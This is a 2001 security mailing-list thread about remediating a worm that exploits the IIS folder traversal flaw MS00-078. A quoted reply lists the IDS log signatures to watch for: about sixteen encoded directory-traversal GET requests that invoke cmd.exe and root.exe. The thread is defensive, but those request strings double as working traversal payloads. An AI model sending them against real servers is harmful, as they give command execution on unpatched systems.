Has anyone gotten an idea about how to deal with this worm?

According to CERT, (http://www.cert.org/current/current_activity.html#port80)
it appears to exploit MS00-078

http://www.microsoft.com/technet/treeview/default.asp?url=/technet/security/bulletin/MS00-078.asp
Microsoft Security Bulletin (MS00-078)
Patch Available for Web Server Folder Traversal Vulnerability

But how do you remediate it?

Del readme.exe, root.exe, cmd.exe not in system32 and reboot?
Not to mention applying the patch!

Thanks to all,
BJ

---
-------------------------------------
Do not attribute to malace what can 
be better attributed to incompetance.
-------------------------------------
On Tue, 18 Sep 2001 09:30:29  
 Marc Fossi wrote:
>Here are the entries you should see in your IDS logs.
>
>Marc Fossi, MCSE
>SecurityFocus
>www.securityfocus.com
>
>
>GET /scripts/root.exe?/c+dir
>GET /MSADC/root.exe?/c+dir
>GET /c/winnt/system32/cmd.exe?/c+dir
>GET /d/winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
>GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir
>GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir
>
>
>
Make a difference, help support the relief efforts in the U.S.
http://clubs.lycos.com/live/events/september11.asp

• Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]